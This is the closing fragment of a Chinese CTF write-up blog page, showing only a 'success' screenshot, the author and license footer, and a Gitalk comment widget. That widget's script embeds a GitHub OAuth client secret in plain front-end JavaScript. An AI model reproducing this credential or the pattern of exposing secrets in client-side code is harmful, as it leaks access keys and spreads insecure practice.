<h2 id="success-2"><a href="#success-2" class="headerlink" title="success"></a>success</h2><p><img data-sizes="auto" data-src="https://img-blog.csdnimg.cn/20201023105315106.png#pic_center" alt="在这里插入图片描述" class="lazyload"></p>

  </article>

  <div class="nexmoe-post-meta nexmoe-rainbow">
    
        <a class="nexmoefont icon-appstore-fill -link" href="/categories/ctf/">ctf</a>
    
    
</div>

  <div class="nexmoe-post-footer">
    
      
  <div class="nexmoe-post-copyright">
    <strong>本文作者：</strong>tothemoon<br>
    <strong>本文链接：</strong><a href="http://tothemoon2019.github.io/2020/10/21/%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20[[HFCTF2020]JustEscape%20[BJDCTF2020]EasySearch%20HCTF-2018-Web-warmup]/" title="http:&#x2F;&#x2F;tothemoon2019.github.io&#x2F;2020&#x2F;10&#x2F;21&#x2F;%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20[[HFCTF2020]JustEscape%20[BJDCTF2020]EasySearch%20HCTF-2018-Web-warmup]&#x2F;" target="_blank" rel="noopener">http:&#x2F;&#x2F;tothemoon2019.github.io&#x2F;2020&#x2F;10&#x2F;21&#x2F;%E7%AC%AC%20%E4%BA%94%20%E5%91%A8%20write%20up%20[[HFCTF2020]JustEscape%20[BJDCTF2020]EasySearch%20HCTF-2018-Web-warmup]&#x2F;</a><br>
    
      <strong>版权声明：</strong>本文采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/cn/deed.zh" target="_blank">CC BY-NC-SA 3.0 CN</a> 协议进行许可
    
  </div>


    
    <section class="nexmoe-comment">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.css">
<div id="gitalk"></div>
<script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.0/dist/gitalk.min.js"></script>
<script type="text/javascript">
    var gitalk = new Gitalk({
        clientID: '80b2453b6d5f37ad6225',
        clientSecret: '43e99fa852795c9a7b3eb924b2558c64b84bbdeb',
        id: window.location.pathname,
        repo: 'nexmoe.github.io',
        owner: 'nexmoe',
        admin: 'nexmoe'
    })
    gitalk.render('gitalk')
</script>
</section>
  </div>
</div>
    </div>
  </div>
  <script src="https://cdn.jsdelivr.net/combine/npm/lazysizes@5.1.0/lazysizes.min.js,gh/highlightjs/cdn-release@9.15.8/build/highlight.min.js,npm/mdui@0.4.3/dist/js/mdui.min.js,gh/nexmoe/nexmoe.github.io@latest/js/app.js"></script>
<script>hljs.initHighlightingOnLoad();</script>
<!--<script src="/js/app.js?v=1604670505459"></script>-->


    <script src="https://cdn.jsdelivr.net/gh/xtaodada/xtaodada.github.io@0.0.2/copy.js"></script>



  





</body>

</html>
